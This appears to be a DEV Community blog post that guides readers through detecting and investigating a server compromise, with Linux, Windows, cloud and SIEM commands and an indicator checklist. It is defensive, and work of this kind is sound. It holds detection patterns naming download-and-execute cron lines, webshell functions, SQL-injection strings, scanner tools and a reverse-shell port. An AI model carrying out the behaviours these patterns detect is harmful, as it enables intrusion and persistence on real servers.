DEV Community

Olawale Afuye

How to Know If a Threat Actor Has Accessed Your Server

1. Introduction

Every server connected to the internet is a target. It is not a question of if someone will attempt to access it without authorisation — it is a question of when, and whether you will detect it in time.

A server compromise occurs when an unauthorised party gains access to a system in a way that was not intended, permitted, or expected. This could range from a low-privilege attacker who merely explored your file system to a sophisticated threat actor who has maintained persistent access for months, exfiltrated data, and planted backdoors before you noticed anything unusual.

Normal vs. Suspicious vs. Confirmed Compromise

Understanding the difference between these three states is the foundation of any incident investigation.

| State | Description | Example |
|---|---|---|
| Normal access | Expected behaviour from known users, services, or automated systems | Your deployment pipeline SSH-ing in as deploy at 2:00 AM |
| Suspicious access | Anomalous activity that may or may not be malicious; requires investigation | A root login from an unrecognised IP at 3:47 AM |
| Confirmed compromise | Evidence of unauthorised access, malicious activity, or data breach | A reverse shell process running as www-data; unknown SSH keys added |

The critical skill is recognising the gap between "something looks off" and "we have been breached." Many teams either dismiss suspicious signals too quickly or panic at false positives. This guide will help you tell the difference — and act accordingly.


2. Common Signs a Threat Actor Accessed a Server

Before diving into log analysis, you need to know what you are looking for. The following indicators are the most common signals that something is wrong.

2.1 Unusual Login Attempts (SSH / RDP / API)

Brute-force attempts are often a precursor to or evidence of access. A high volume of failed logins followed by a single successful one is a textbook sign of a successful brute-force attack.

What to look for:

  • Multiple failed SSH attempts from the same or rotating IP addresses
  • Successful logins from geographic locations inconsistent with your team
  • Logins at unusual hours (3:00 AM when your team is in Lagos/London/NYC)
  • Logins from IPs flagged in threat intelligence databases (Shodan, AbuseIPDB)
  • API authentication tokens used from unexpected IP ranges
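
The "many failures, then one success" pattern can be checked mechanically. The following is a minimal sketch rather than a hardened detector: it assumes the usual OpenSSH messages found in auth.log ("Failed password ... from IP" and "Accepted ... from IP"), and both the function name flag_bruteforce_success and the threshold are illustrative choices.

```shell
# Sketch: flag source IPs that log in successfully after many failed attempts.
# Reads sshd log lines on stdin; $1 is the failure threshold (assumed default: 5).
flag_bruteforce_success() {
  local threshold="${1:-5}"
  awk -v threshold="$threshold" '
    # Return the word that follows "from" (the source IP in sshd messages).
    function source_ip(line,    i, n, parts) {
      n = split(line, parts, " ")
      for (i = 1; i < n; i++) if (parts[i] == "from") return parts[i + 1]
      return ""
    }
    /sshd.*Failed password/ { ip = source_ip($0); if (ip != "") failed[ip]++ }
    /sshd.*Accepted /       { ip = source_ip($0)
                              if (ip != "" && failed[ip] >= threshold)
                                print ip, failed[ip] }
  '
}
```

For example, `flag_bruteforce_success 5 < /var/log/auth.log` prints each source IP that authenticated after at least five failures, followed by the failure count. Treat a hit as a lead to investigate, since a colleague who mistyped a password several times will match too.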

2.2 Unknown Users or Privilege Escalation

Attackers often create backdoor accounts or escalate privileges to maintain access.

What to look for:

  • New user accounts in /etc/passwd you did not create
  • Users added to sudo or the wheel group without authorisation
  • Changes to /etc/sudoers or /etc/sudoers.d/
  • A non-root user suddenly running processes as root
  • SUID/SGID binaries that were not there before
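
Two of these checks are easy to script against passwd-format input. The sketch below is illustrative only: the function names are made up for this example, and the "known accounts" file (one account name per line) is an assumed baseline you would have to maintain yourself.

```shell
# Sketch: list accounts other than root that have UID 0 (passwd-format input on stdin).
list_extra_uid0() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Sketch: list account names that are missing from a baseline file.
# $1 is a hypothetical file holding one known-good account name per line.
unknown_accounts() {
  cut -d: -f1 | grep -vxFf "$1"
}
```

Typical use would be `list_extra_uid0 < /etc/passwd` and `unknown_accounts known_accounts.txt < /etc/passwd`. Any output from the first command deserves immediate attention, because a second UID 0 account is rarely legitimate.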

2.3 Unexpected Running Processes / Services

Malicious actors install tools — cryptominers, reverse shells, data exfiltration agents. These show up as unexpected processes.

What to look for:

  • Processes with random or disguised names (e.g., kworkerds, sysupdate, .init)
  • Processes listening on unusual ports
  • Unknown services registered with systemd or init.d
  • Processes consuming excessive CPU (often cryptominers)
  • Processes running as www-data, nginx, or other service accounts but performing non-service tasks
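
The last indicator, service accounts doing non-service work, can be approximated by looking for shells and network tools owned by web-server users. This is a rough sketch under stated assumptions: the account list and the list of suspect command names are examples to adapt, and the function name flag_service_shells is hypothetical.

```shell
# Sketch: flag shells or network tools running under web-server accounts.
# Expects "user pid ppid command" rows on stdin, e.g. from:
#   ps -eo user=,pid=,ppid=,comm=
flag_service_shells() {
  awk '
    BEGIN {
      # Both lists are illustrative assumptions; adjust them to your environment.
      n = split("www-data nginx apache", svc, " ")
      for (i = 1; i <= n; i++) is_service[svc[i]] = 1
      m = split("sh bash dash zsh nc ncat socat", bad, " ")
      for (i = 1; i <= m; i++) is_suspect[bad[i]] = 1
    }
    ($1 in is_service) && ($4 in is_suspect) { print $2, $1, $4 }
  '
}
```

Running `ps -eo user=,pid=,ppid=,comm= | flag_service_shells` prints the PID, owner, and command of each match. Some applications legitimately spawn a shell, so check the parent process before concluding anything.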

2.4 Modified System Files / Configurations

Attackers modify system files to maintain persistence or disable defences.

What to look for:

  • Changes to /etc/hosts (overriding name resolution to redirect traffic)
  • Modified shell profiles: .bashrc, .bash_profile, .profile, /etc/profile.d/
  • Altered PAM configuration files (/etc/pam.d/)
  • Modified SSH server config (/etc/ssh/sshd_config) — e.g., PermitRootLogin yes added
  • Timestamp discrepancies on critical binaries (ls, ps, netstat, find)
  • Changes to web application files (index.php, config.js) — webshells

2.5 Unusual Outbound / Inbound Network Traffic

Data exfiltration and command-and-control (C2) communication create distinctive network patterns.

What to look for:

  • Large outbound data transfers to unknown IPs, especially at odd hours
  • Connections to known malicious IP ranges or Tor exit nodes
  • Unusual protocols or ports (IRC on port 6667, DNS tunnelling, ICMP data transfer)
  • New persistent connections to external IPs from service accounts
  • DNS queries to domains with high entropy (DGA — Domain Generation Algorithm)

2.6 High CPU, RAM, or Disk Usage Anomalies

Resource abuse is one of the most visible (and often first noticed) signs of compromise.

What to look for:

  • CPU usage consistently above 80–90% with no corresponding application load
  • Disk I/O spikes with no scheduled jobs running
  • Disk filling up rapidly with unexpected files
  • Memory exhaustion tied to an unknown process
  • Sustained CPU load from an unfamiliar process (cryptomining malware is a frequent cause and shows up clearly in resource graphs)

2.7 Disabled Security Tools or Logs

A sophisticated attacker's first action is often to blind your monitoring.

What to look for:

  • auditd, fail2ban, iptables, or ufw suddenly stopped or disabled
  • Log files that are empty, truncated, or have suspicious gaps
  • cron entries that pipe logs to /dev/null
  • Security agent (CrowdStrike, Wazuh, OSSEC) reporting offline
  • syslog daemon stopped or replaced

2.8 Unexpected Cron Jobs / Scheduled Tasks

Cron is a favourite persistence mechanism for attackers.

What to look for:

  • Entries in /var/spool/cron/crontabs/ you do not recognise
  • New files in /etc/cron.d/, /etc/cron.hourly/, /etc/cron.daily/
  • Cron jobs that download and execute scripts from external URLs
  • Windows: Scheduled Tasks created under \Microsoft\Windows\ in Task Scheduler
  • Systemd timers (systemctl list-timers) that are unexpected
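
Cron entries that download and execute a script tend to share a recognisable shape: a curl or wget call piped into a shell. The sketch below searches for that shape only. The function name find_cron_downloaders is illustrative, and the pattern will miss variants such as a download saved to disk and executed in a later step.

```shell
# Sketch: print cron lines that fetch something with curl/wget and pipe it to a shell.
# Arguments are the cron files to scan; output is "file:line-number:matching line".
find_cron_downloaders() {
  grep -HnE '(curl|wget)[^|#]*\|[[:space:]]*(ba|da)?sh([[:space:]]|$)' "$@" 2>/dev/null
}
```

A typical invocation would be `find_cron_downloaders /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*`. An empty result does not clear the host; it only means this one pattern was not found.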

2.9 New SSH Keys or Changed Credentials

Attackers plant SSH keys to ensure persistent re-entry even after passwords are changed.

What to look for:

  • New entries in ~/.ssh/authorized_keys for root or any user
  • New keys in /etc/ssh/authorized_keys (if configured globally)
  • SSH host keys regenerated (check /etc/ssh/ssh_host_*)
  • Changed /etc/passwd or /etc/shadow entries (password hash changes)
  • Cloud metadata service SSH key updates (AWS EC2 Instance Connect, GCP OS Login)
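
Spotting a planted key is much easier if you keep a list of the keys you expect. The following sketch assumes such an allow-list exists as a file with one base64 key blob per line; that format, and the function name unknown_keys, are assumptions made for this example.

```shell
# Sketch: print authorized_keys entries whose key blob is not in an allow-list.
# $1 = authorized_keys file, $2 = allow-list (hypothetical: one base64 blob per line).
unknown_keys() {
  local keys_file="$1" allowlist="$2"
  # Drop blank lines and comments, then keep entries where no field is an allowed blob.
  grep -vE '^[[:space:]]*(#|$)' "$keys_file" | awk -v allow="$allowlist" '
    BEGIN { while ((getline blob < allow) > 0) if (blob != "") ok[blob] = 1 }
    { known = 0
      for (i = 1; i <= NF; i++) if ($i in ok) known = 1
      if (!known) print }
  '
}
```

For example, `unknown_keys /root/.ssh/authorized_keys team_keys.txt` prints only the entries you have not approved. Matching on the key blob rather than the trailing comment matters, because the comment is free text that an attacker can set to anything.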

3. Where to Check — Logs & Evidence Sources

Once you suspect compromise, you need to know exactly where to look. Here is a comprehensive map of log locations and what each reveals.

3.1 Linux System Logs

| Log File | Location | What It Contains |
|---|---|---|
| auth.log | /var/log/auth.log (Debian/Ubuntu) | SSH logins, sudo usage, PAM events |
| secure | /var/log/secure (RHEL/CentOS/Amazon Linux) | Same as auth.log for RPM-based distros |
| syslog | /var/log/syslog | General system messages, daemon activity |
| kern.log | /var/log/kern.log | Kernel events, unusual driver/module loads |
| wtmp | /var/log/wtmp | Binary log of all logins/logouts (read with last) |
| btmp | /var/log/btmp | Binary log of failed logins (read with lastb) |
| lastlog | /var/log/lastlog | Most recent login per user (read with lastlog) |
| audit.log | /var/log/audit/audit.log | System call auditing (if auditd is enabled) |

Using journalctl (systemd-based systems):

# Show all logs from the past 24 hours
journalctl --since "24 hours ago"

# Show SSH service logs (the unit is "ssh" on Debian/Ubuntu and "sshd" on RHEL-family systems)
journalctl -u ssh --since "2024-01-01" --until "2024-01-07"

# Show logs for a specific process ID
journalctl _PID=1234

# Show kernel messages
journalctl -k

# Follow logs in real time
journalctl -f

# Show logs with priority warning or higher
journalctl -p warning

3.2 Windows Event Viewer

For Windows Server environments, the Event Viewer and wevtutil are your primary tools.

| Event ID | Meaning |
|---|---|
| 4624 | Successful logon |
| 4625 | Failed logon |
| 4648 | Logon attempted using explicit credentials (for example runas; worth reviewing as a possible sign of lateral movement) |
| 4720 | A user account was created |
| 4728 / 4732 | User added to a security-enabled global / local group |
| 4756 | User added to a security-enabled universal group |
| 4768 / 4769 | Kerberos ticket request (TGT / service ticket) |
| 4771 | Kerberos pre-auth failure |
| 7045 | A new service was installed |
| 4698 | A scheduled task was created |

# Query failed logons in the past hour
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625; StartTime=(Get-Date).AddHours(-1)}

# Query new service installations
Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045}

# Export security logs for offline analysis
wevtutil epl Security C:\forensics\security.evtx

3.3 Web Server Logs

Web servers are frequent entry points via exploited applications, LFI, RFI, SQL injection, or webshells.

Nginx:

# Default access log
tail -f /var/log/nginx/access.log

# Look for POST requests to unusual paths (webshell access)
grep "POST" /var/log/nginx/access.log | grep -v "api\|login\|upload"

# Look for scanning patterns (many 404s from one IP)
# Assumes the default "combined" log format, where field 9 is the status code
awk '$9 == 404 {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20

# Look for unusual user agents (curl, python-requests, sqlmap)
grep -i "sqlmap\|nikto\|nmap\|masscan\|python-requests\|curl" /var/log/nginx/access.log

Apache:

# Apache access log
tail -f /var/log/apache2/access.log

# Combined log format analysis: HTTP status code distribution
awk '{print $9}' /var/log/apache2/access.log | sort | uniq -c | sort -rn

# Successful (200) requests grouped by path; repeated hits on an unfamiliar script may be webshell traffic
awk '$9 == 200 {print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -20

3.4 Cloud Audit Logs

In cloud environments, audit logs are your CCTV footage. Never ignore them.

AWS CloudTrail:

# Use AWS CLI to query CloudTrail events
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time 2024-01-01T00:00:00Z \
  --end-time 2024-01-07T00:00:00Z

# Look for root account usage (always suspicious)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=root

# Look for IAM changes
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser

# Look for security group changes (attacker opening ports)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AuthorizeSecurityGroupIngress

GCP Audit Logs (via gcloud):

# View admin activity logs
gcloud logging read "logName=projects/YOUR_PROJECT/logs/cloudaudit.googleapis.com%2Factivity" \
  --limit 100 --format json

# Filter for IAM policy changes
gcloud logging read 'protoPayload.methodName="SetIamPolicy"' --limit 50

Azure Monitor:

# Query the activity log for role assignment changes (Azure CLI)
az monitor activity-log list \
  --start-time 2024-01-01T00:00:00Z \
  --end-time 2024-01-07T00:00:00Z \
  --query "[?authorization.action=='Microsoft.Authorization/roleAssignments/write']"

3.5 Firewall and WAF Logs

# iptables — view current rules
iptables -L -n -v

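# View recent iptables log entries (only present if you have LOG rules; they carry whatever
# --log-prefix you configured, so adjust the pattern and log file to match your setup)
grep -i "iptables" /var/log/syslog | tail -50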

# UFW logs
grep "UFW" /var/log/ufw.log | grep "BLOCK" | tail -50

# fail2ban — view currently banned IPs
fail2ban-client status sshd

# List all configured jails (then run "status <jail>" for each one to see its bans)
fail2ban-client status

3.6 Container and Kubernetes Logs

# Docker — view container logs
docker logs <container_id> --tail 200 --follow

# Inspect a running container's processes
docker top <container_id>

# Check for unexpected containers
docker ps -a

# Kubernetes: view pod logs (--previous shows the prior container instance, useful after a restart)
kubectl logs <pod-name> -n <namespace> --previous

# View recent cluster events (these are not the API server audit log, which is written
# wherever the API server's audit policy and backend are configured to send it)
kubectl get events --sort-by=.metadata.creationTimestamp -n kube-system

# Check for privileged pods (common escalation vector)
kubectl get pods --all-namespaces -o json | \
  jq -r '.items[] | select(any(.spec.containers[]; .securityContext.privileged == true)) | "\(.metadata.namespace)/\(.metadata.name)"'

3.7 EDR and SIEM Alerts

If you have an endpoint detection and response (EDR) tool like CrowdStrike, SentinelOne, Wazuh, or a SIEM like Splunk or the Elastic Stack, these are your most powerful investigation tools.

Key queries to run in your SIEM:

# Splunk: find parent-child process anomalies (webshell execution)
index=endpoint | eval parent_child=parent_process+"-"+process_name
| stats count by parent_child | sort -count

# Elastic/Kibana KQL: find new privileged users
event.code: 4728 OR event.code: 4732

# Elastic/Kibana KQL: look for lateral movement (new SMB connections)
event.action: "network_connection" AND destination.port: 445

4. Step-by-Step Investigation Playbook

When you have a suspected compromise, do not panic and do not immediately shut the server down — you may destroy forensic evidence. Follow this structured process.

┌─────────────────────────────────────────────────────────────────┐
│                  INCIDENT INVESTIGATION FLOW                    │
│                                                                 │
│  1. Confirm Indicators  →  2. Preserve Evidence                 │
│           ↓                        ↓                            │
│  3. Identify Access     →  4. Determine Attacker Actions        │
│     Vector                         ↓                            │
│           ↓                5. Check Persistence                 │
│  6. Scope Affected      ←          ↓                            │
│     Systems             ←  7. Reconstruct Timeline              │
└─────────────────────────────────────────────────────────────────┘

Step 1 — Confirm Suspicious Indicators

Before escalating, verify that what you are seeing is genuinely anomalous. Cross-reference against:

  • Your deployment schedule (was that 3 AM login from your CI/CD pipeline?)
  • IP allow-lists and team VPN ranges
  • Recently onboarded engineers or contractors
  • Any known penetration tests or red team engagements

If you still cannot explain the activity after cross-referencing, treat it as an incident and move straight to evidence preservation.

Step 2 — Preserve Evidence

This is the most time-critical step. Evidence can be overwritten, logs can rotate, and memory is volatile.

# Create a forensics output directory
mkdir -p /tmp/forensics && cd /tmp/forensics

# Capture running processes snapshot
ps auxf > processes.txt

# Capture listening sockets and active network connections
# (-a includes established connections; -l alone would list only listeners)
ss -tunap > network_connections.txt
netstat -tunap >> network_connections.txt

# Capture logged-in users
who > who.txt
w >> who.txt
last -n 100 > last_logins.txt

# Dump current iptables rules
iptables-save > iptables_rules.txt

# Dump crontabs
crontab -l > root_cron.txt 2>/dev/null
for user in $(cut -f1 -d: /etc/passwd); do
  echo "=== $user ===" >> all_crontabs.txt
  crontab -u $user -l 2>/dev/null >> all_crontabs.txt
done

# Capture loaded kernel modules
lsmod > kernel_modules.txt

# Copy critical log files
cp /var/log/auth.log ./ 2>/dev/null || cp /var/log/secure ./ 2>/dev/null
cp /var/log/syslog ./ 2>/dev/null

# Take a memory dump (if AVML or LiME is available)
# avml /tmp/forensics/memory.lime

# Hash all collected files for chain-of-custody
sha256sum * > evidence_hashes.txt

Important: If possible, take an EBS/disk snapshot (AWS) or equivalent cloud snapshot before doing anything else. This preserves the entire disk state.

Step 3 — Identify the Initial Access Vector

How did they get in? Common vectors and where to look for each:

| Vector | Where to Look |
|---|---|
| Brute-forced SSH | auth.log: many failed logins, then a success |
| Exploited web application | Web server logs: unusual POST requests, error 500 spikes |
| Stolen credentials (leaked key) | CloudTrail / IAM logs: access from unexpected IPs |
| Supply chain (compromised dependency) | Application logs: unusual library behaviour |
| Phishing → credential theft | Email logs, browser forensics, SIEM identity events |
| Unpatched CVE | Check installed software versions: nginx -v, python3 --version, etc. |
| Exposed S3 bucket / GCS bucket | Cloud storage access logs |
| Misconfigured cloud metadata service | SSRF logs, cloud audit logs for credential usage |

# Check SSH login history for the first suspicious successful login
grep "Accepted" /var/log/auth.log | grep -v "YOUR_KNOWN_IPS"

# Check for web exploitation via suspicious HTTP methods/paths
grep -E "(UNION|SELECT|DROP|exec\(|eval\(|base64_decode|cmd=|exec=)" \
  /var/log/nginx/access.log

# Find files modified in the last 7 days; may reveal dropped payloads
# (mtime can be forged with touch, so treat results as leads rather than proof)
find / -mtime -7 -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null | \
  grep -v "\.log$" | head -50

Step 4 — Determine Attacker Actions (What Did They Do?)

Reconstruct what commands were run, what data was accessed, and what was changed.

# Check bash history for all users (attackers sometimes forget to clear it)
# Home directories come from field 6 of /etc/passwd, which avoids running eval on account names
while IFS=: read -r user _ _ _ _ home _; do
  if [ -f "$home/.bash_history" ]; then
    echo "=== History for $user ==="
    cat "$home/.bash_history"
  fi
done < /etc/passwd

# Check if history was cleared (a sign of an attacker)
# An empty .bash_history with a recent mtime is suspicious
ls -la /root/.bash_history

# Check recently accessed files
# (atime is unreliable on filesystems mounted with noatime or relatime)
find / -atime -1 -type f -not -path "/proc/*" 2>/dev/null | head -30

# Check audit logs for specific commands (if auditd was running)
ausearch -i -m execve --start recent

# Look for outbound connections that occurred
# (ss prints ESTAB and SYN-SENT; netstat prints ESTABLISHED and SYN_SENT)
grep -E "ESTAB|SYN[-_]SENT" /tmp/forensics/network_connections.txt

Step 5 — Check Persistence Mechanisms

Attackers leave backdoors. Find them all before remediation.

# ── SSH Keys ──────────────────────────────────────────────────────
# Check all users' authorized_keys files (prints each path, then its contents)
find /home /root /etc -name "authorized_keys*" -print -exec cat {} \; 2>/dev/null

# ── Cron Jobs ─────────────────────────────────────────────────────
ls -la /etc/cron* /var/spool/cron/crontabs/
cat /etc/cron.d/*

# ── Systemd Services ──────────────────────────────────────────────
systemctl list-units --type=service --state=running --no-legend
# Look for unfamiliar service names
find /etc/systemd/system/ -name "*.service" -newer /etc/passwd

# ── Web Shells ────────────────────────────────────────────────────
# Find PHP webshells (eval, system, exec functions)
find /var/www /srv /opt -name "*.php" -exec grep -l "eval\|system\|exec\|base64_decode" {} \;

# ── SUID Binaries (privilege escalation tools) ────────────────────
find / -perm -4000 -type f -not -path "/proc/*" 2>/dev/null

# ── Startup Scripts ───────────────────────────────────────────────
ls -la /etc/rc.local /etc/rc*.d/ /etc/init.d/
cat /etc/rc.local

# ── LD_PRELOAD Hijacking ──────────────────────────────────────────
cat /etc/ld.so.preload 2>/dev/null
env | grep LD_PRELOAD

Step 6 — Scope Affected Systems

Did the attacker move laterally?

# Check for other hosts this server connects to
cat ~/.ssh/known_hosts
cat /etc/hosts
arp -n  # Other hosts in the LAN

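# Review SSH logins recorded on this server (inbound only; outbound hops from this host
# show up in shell history, known_hosts, and the auth logs of the destination hosts)
grep "Accepted\|publickey\|password" /var/log/auth.log | grep "from"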

# Check for any cloud API calls that may have been made from this server
grep "aws\|gcloud\|az " /root/.bash_history

# Review AWS IAM credentials used from this instance
# If this is an EC2 instance with an IAM role, the role session name is normally the instance ID,
# so CloudTrail event history should list those calls under that user name
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=i-YOUR_INSTANCE_ID

Step 7 — Timeline Reconstruction

Build a precise timeline of events to understand the full scope.

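# Create a unified timeline using log2timeline/plaso (forensics tool)
# Install: pip install plaso
# Recent plaso releases take the output file via --storage-file; older ones took it as the first argument
log2timeline.py --storage-file /tmp/timeline.plaso /var/log/

# Or manually using timestamps from logs
# Combine auth.log and syslog, which share the "Mon DD HH:MM:SS" prefix, sorted by month, day, and time
# (web access logs use a different timestamp format and must be converted before merging)
cat /var/log/auth.log /var/log/syslog | \
  sort -s -k1,1M -k2,2n -k3,3 > /tmp/forensics/unified_timeline.txt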

# Find file modifications around the suspected breach time
# Example: if breach suspected around 2024-01-15 03:00 UTC
find / -newermt "2024-01-15 02:00" ! -newermt "2024-01-15 06:00" \
  -type f -not -path "/proc/*" 2>/dev/null
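
Merging system logs with web access logs only works once both carry the same sortable timestamp. The sketch below prefixes each line with a "YYYY-MM-DD HH:MM:SS" key and leaves the original line intact after a tab. It rests on several assumptions: classic syslog lines omit the year, so you supply one; time zone offsets are ignored, so all sources are assumed to log in the same zone; and the function name normalise_timestamps is illustrative.

```shell
# Sketch: prefix syslog-style and combined-access-log lines with a sortable timestamp.
# $1 = year to assume for syslog lines (they do not record one).
normalise_timestamps() {
  awk -v year="$1" '
    BEGIN { split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", names, " ")
            for (i = 1; i <= 12; i++) mon[names[i]] = sprintf("%02d", i) }
    # Classic syslog: "Jan 15 03:47:10 host ..."
    ($1 in mon) && $3 ~ /^[0-9][0-9]:[0-9][0-9]:[0-9][0-9]$/ {
      printf "%s-%s-%02d %s\t%s\n", year, mon[$1], $2, $3, $0; next }
    # Combined access log: ip - - [15/Jan/2024:03:47:12 +0000] "..."
    $4 ~ /^\[[0-9]+\/[A-Za-z]+\/[0-9]+:/ {
      split(substr($4, 2), t, "[/:]")      # t = day, month, year, hh, mm, ss
      printf "%s-%s-%02d %s:%s:%s\t%s\n", t[3], mon[t[2]], t[1], t[4], t[5], t[6], $0 }
  '
}
```

One way to use it: `cat /var/log/auth.log /var/log/nginx/access.log | normalise_timestamps 2024 | LC_ALL=C sort > /tmp/forensics/unified_timeline.txt`. Lines in any other format are silently dropped, so compare line counts before relying on the result.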

5. Useful Commands & Tools

5.1 Login and Session Investigation

# ── last ──────────────────────────────────────────────────────────
# Shows login history: user, TTY, source IP, date/time, duration
last -n 50 -a  # -a shows hostname/IP in last column

# ── lastlog ───────────────────────────────────────────────────────
# Shows the most recent login for every account on the system
# Useful for spotting accounts that should never log in (www-data, daemon)
lastlog

# Filter to show only accounts that HAVE logged in
lastlog | grep -v "Never logged in"

# ── who ───────────────────────────────────────────────────────────
# Shows who is currently logged in
who -a  # -a shows all info including run-level and system boot time

# ── w ─────────────────────────────────────────────────────────────
# Like who, but also shows what command each logged-in user is running
w

5.2 Process Investigation

# ── ps aux ────────────────────────────────────────────────────────
# Full process listing: user, PID, CPU%, MEM%, command
ps aux

# Sort by CPU usage (find cryptominers)
ps aux --sort=-%cpu | head -20

# Sort by memory usage
ps aux --sort=-%mem | head -20

# Show process tree (reveals parent-child relationships — key for detecting shells)
ps auxf

# ── pstree ────────────────────────────────────────────────────────
# Visual process tree — attackers' reverse shells usually appear as children of web processes
pstree -aup

# ── lsof ──────────────────────────────────────────────────────────
# List all open files and network connections by process
lsof -i  # Show all network connections

# Show what process is using a specific port
lsof -i :4444  # 4444 is a common reverse shell port

# Show all files opened by a specific process
lsof -p <PID>

# Show deleted files that are still open (attacker may have deleted malware but it's still running)
lsof | grep deleted

5.3 Network Investigation

# ── netstat ───────────────────────────────────────────────────────
# Show all listening ports and established connections
netstat -tulpn   # -t TCP, -u UDP, -l listening, -p show PID, -n numeric

# Show all established connections
netstat -an | grep ESTABLISHED

# ── ss ────────────────────────────────────────────────────────────
# Faster modern replacement for netstat
ss -tulpn        # Same flags as netstat
ss -tnp          # Show TCP connections with process names

# Find processes with unexpected external connections
ss -tnp | grep -v "127.0.0.1\|::1\|YOUR_KNOWN_IPS"

5.4 File System Forensics

# ── find with -mtime ──────────────────────────────────────────────
# Find files modified in the last N days
find / -mtime -1 -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

# Find files modified within a specific time range
find /var/www -newermt "2024-01-15 00:00" ! -newermt "2024-01-16 00:00" -type f

# Find files with unusual permissions (world-writable)
find / -perm -o+w -type f -not -path "/proc/*" 2>/dev/null

# Find SUID/SGID binaries
find / -type f \( -perm -4000 -o -perm -2000 \) -not -path "/proc/*" 2>/dev/null

# Find hidden files and directories
find / -name ".*" -type f -not -path "/proc/*" -not -path "/home/*/.bash*" 2>/dev/null | head -30

5.5 Rootkit Detection

# ── chkrootkit ────────────────────────────────────────────────────
# Scans for known rootkits by checking system binaries and /proc
# Install: apt install chkrootkit OR yum install chkrootkit
chkrootkit

# Run in quiet mode (only show positive findings)
chkrootkit -q

# ── rkhunter ──────────────────────────────────────────────────────
# More comprehensive: checks binaries, rootkits, backdoors, config
# Install: apt install rkhunter
rkhunter --update          # Update database first
rkhunter --check           # Full system scan
rkhunter --check --rwo     # Only show warnings

5.6 System Auditing

# ── auditd ────────────────────────────────────────────────────────
# The Linux Audit Framework — records system calls
# Install: apt install auditd  OR  yum install audit

# Start and enable
systemctl enable auditd && systemctl start auditd

# Add watch rules (auditctl changes last until reboot; put the same rules in /etc/audit/rules.d/audit.rules to persist them)
# Watch for writes to /etc/passwd
auditctl -w /etc/passwd -p wa -k passwd_change

# Watch for execution of suspicious binaries
auditctl -w /tmp -p x -k tmp_exec
auditctl -w /bin/bash -p x -k bash_exec

# Search audit log for specific events
ausearch -k passwd_change  # Find events matching our watch key
ausearch -m execve --start today  # All exec calls today
ausearch -x /bin/bash --start yesterday  # Bash executions yesterday

# Generate a human-readable audit report
aureport --summary
aureport --login --failed  # Failed logins
aureport -x                # Executable events

# ── fail2ban ──────────────────────────────────────────────────────
# Monitors logs and bans IPs after repeated failures
# Install: apt install fail2ban
systemctl status fail2ban

# Check active bans
fail2ban-client status
fail2ban-client status sshd

# View banned IPs
fail2ban-client banned

# Manually ban an IP
fail2ban-client set sshd banip 203.0.113.42

# Check if a specific IP is banned in a jail
fail2ban-client status sshd | grep -F "203.0.113.42"

6. Indicators of Compromise (IoC) Checklist

Use this checklist during an active investigation. Check each item and record your findings.

| # | Indicator | Where to Check | Status |
|---|---|---|---|
| 1 | New or unrecognised user accounts | /etc/passwd, /etc/shadow | |
| 2 | Users added to sudo / wheel group | /etc/sudoers, getent group sudo | |
| 3 | Unrecognised SSH authorized_keys | ~/.ssh/authorized_keys (all users) | |
| 4 | Unexpected successful SSH logins | /var/log/auth.log or secure | |
| 5 | Logins from unexpected IPs or geos | last -a, CloudTrail / audit logs | |
| 6 | Unknown or high-CPU processes | ps aux --sort=-%cpu | |
| 7 | Processes listening on unexpected ports | ss -tulpn, netstat -tulpn | |
| 8 | Unexpected outbound connections | ss -tnp, firewall logs | |
| 9 | Unknown or modified cron jobs | crontab -l, /etc/cron.d/ | |
| 10 | Unknown systemd services | systemctl list-units --type=service | |
| 11 | Modified system binaries (ls, ps, etc.) | rkhunter, debsums, rpm -Va | |
| 12 | Webshells in web root | find /var/www -name "*.php" -exec grep -l eval {} \; | |
| 13 | SUID binaries not in baseline | find / -perm -4000 | |
| 14 | Modified /etc/hosts or DNS config | cat /etc/hosts, cat /etc/resolv.conf | |
| 15 | Modified SSH server config | cat /etc/ssh/sshd_config | |
| 16 | Modified PAM config | ls -la /etc/pam.d/ | |
| 17 | Disabled or stopped security tools | systemctl status auditd fail2ban | |
| 18 | Gaps or tampering in log files | ls -la /var/log/, check file sizes and timestamps | |
| 19 | Unusual files in /tmp, /dev/shm, /var/tmp | ls -la /tmp/ /dev/shm/ /var/tmp/ | |
| 20 | Unexpected kernel modules loaded | lsmod (the header line can be dropped with grep -v "^Module") | |
| 21 | New firewall rules (ports opened) | iptables -L -n, cloud security group logs | |
| 22 | Cloud IAM changes or new API keys | CloudTrail, GCP Audit Logs, Azure Monitor | |
| 23 | Data exfiltration (large outbound transfers) | Network flow logs, VPC Flow Logs | |
| 24 | Rootkit detection findings | chkrootkit -q, rkhunter --check --rwo | |
| 25 | Modified .bashrc / .profile entries | cat /root/.bashrc, cat ~/.bash_profile | |

7. Immediate Response Actions

Once compromise is confirmed, act decisively and in the right order.

7.1 Isolate the Server

Goal: stop the bleeding without destroying evidence.

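# Option A: Block all inbound/outbound traffic except your investigation IP
# (the inserted rules go first, but existing ACCEPT rules further down still apply; review them with iptables -S)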
iptables -I INPUT -s YOUR_IP/32 -j ACCEPT
iptables -I OUTPUT -d YOUR_IP/32 -j ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

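# Option B: AWS. Security groups have no deny rules, so move the instance onto an
# isolation group that has no inbound or outbound rules (sg-ISOLATION is a placeholder)
aws ec2 modify-instance-attribute \
  --instance-id i-YOUR_INSTANCE_ID \
  --groups sg-ISOLATION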

# Option C: Cloud-level — move to an isolated VPC / detach from load balancer
# Do this via your cloud console to avoid SSH lockout

In cloud environments, snapshot the disk before isolating so you have a forensic copy.

7.2 Kill Malicious Sessions

# View active sessions
who
w

# Kill a specific session (use PTS from `who` output)
pkill -KILL -t pts/1

